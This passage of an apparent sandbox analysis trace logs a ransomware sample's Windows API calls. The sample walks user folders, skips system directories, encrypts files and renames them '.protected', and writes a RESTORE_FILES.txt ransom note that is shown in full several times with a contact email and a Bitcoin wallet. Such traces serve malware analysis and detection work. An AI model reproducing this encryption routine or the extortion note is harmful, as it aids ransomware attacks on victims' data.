lpString2="$Recycle.bin") returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="System Volume Information") returned 1 [0089.264] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB") returned 96 [0089.265] lstrcmpW (lpString1="UV0DUWVB", lpString2=".") returned 1 [0089.265] lstrcmpW (lpString1="UV0DUWVB", lpString2="..") returned 1 [0089.265] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet 
Explorer\\DOMStore\\UV0DUWVB\\*") returned 98 [0089.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.265] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.265] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.265] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.265] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.265] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.265] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\.") returned 98 [0089.265] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.265] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.265] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.265] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\uv0duwvb\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.265] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.265] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.265] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.265] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.265] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.265] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.266] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\..") returned 99 [0089.266] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.266] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.266] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.266] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.266] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.266] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.266] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.266] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.266] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\RESTORE_FILES.txt") returned 114 [0089.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\uv0duwvb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.266] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.267] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.267] lstrlenA (lpString="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") returned 684 [0089.267] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.267] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.267] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.267] CloseHandle (hObject=0x150) returned 1 [0089.267] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.267] lstrcmpiW (lpString1="VGMTOI09", lpString2="Windows") returned -1 [0089.267] lstrcmpiW (lpString1="VGMTOI09", lpString2="Program Files") returned 1 [0089.267] lstrcmpiW (lpString1="VGMTOI09", lpString2="Program Files (x86)") returned 1 [0089.268] lstrcmpiW (lpString1="VGMTOI09", lpString2="$Recycle.bin") returned 1 [0089.268] lstrcmpiW (lpString1="VGMTOI09", lpString2="System Volume Information") returned 1 [0089.268] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09") returned 96 [0089.268] lstrcmpW (lpString1="VGMTOI09", lpString2=".") returned 1 [0089.268] lstrcmpW (lpString1="VGMTOI09", lpString2="..") returned 1 [0089.268] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*") returned 98 [0089.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.268] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.268] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.268] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.268] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.268] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.268] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet 
Explorer\\DOMStore\\VGMTOI09\\.") returned 98 [0089.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.268] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.268] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.268] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.268] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.268] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.268] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.268] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.268] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.268] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\..") returned 99 [0089.268] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.268] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.268] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.268] lstrcmpW (lpString1="..", 
lpString2="RESTORE_FILES.txt") returned -1 [0089.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.269] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="Windows") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="Program Files") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="Program Files (x86)") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="$Recycle.bin") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="System Volume Information") returned 1 [0089.269] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.269] StrStrIW (lpFirst="www.msn[1].xml", lpSrch=".protected") returned 0x0 [0089.269] lstrcmpW (lpString1="www.msn[1].xml", lpString2="RESTORE_FILES.txt") returned 1 [0089.269] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.269] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.270] StrStrW (lpFirst="www.msn[1].xml", lpSrch=".txt") returned 0x0 [0089.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.270] StrStrW (lpFirst="www.msn[1].xml", lpSrch=".rar") returned 0x0 [0089.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.270] StrStrW (lpFirst="www.msn[1].xml", lpSrch=".zip") returned 0x0 [0089.270] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x344, lpOverlapped=0x0) returned 1 [0089.280] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffcbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.280] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x344, lpOverlapped=0x0) returned 1 [0089.280] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.280] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.280] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.280] CloseHandle (hObject=0x154) returned 1 [0089.280] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.protected") returned 121 [0089.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.protected")) returned 1 [0089.281] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.281] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.281] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\RESTORE_FILES.txt") returned 114 [0089.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet 
Explorer\\DOMStore\\VGMTOI09\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.282] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.282] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.283] lstrlenA (lpString="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") returned 684 [0089.283] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.283] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.283] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.283] CloseHandle (hObject=0x150) returned 1 [0089.283] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.283] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.283] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt") returned 105 [0089.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.292] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.292] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.293] lstrlenA (lpString="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") returned 684 [0089.293] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.293] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.293] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.293] CloseHandle (hObject=0x14c) returned 1 [0089.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="Windows") returned -1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="Program Files") returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="Program Files (x86)") returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="$Recycle.bin") returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="System Volume Information") returned -1 [0089.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned 87 [0089.294] lstrcmpW (lpString1="Services", lpString2=".") returned 1 [0089.294] lstrcmpW (lpString1="Services", lpString2="..") returned 1 [0089.294] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*") returned 89 [0089.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.294] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.294] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.294] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.294] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.294] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.294] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\.") returned 89 [0089.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.295] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.295] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.295] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.295] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.295] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.295] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.295] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\..") returned 90 [0089.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.295] FindNextFileW (in: 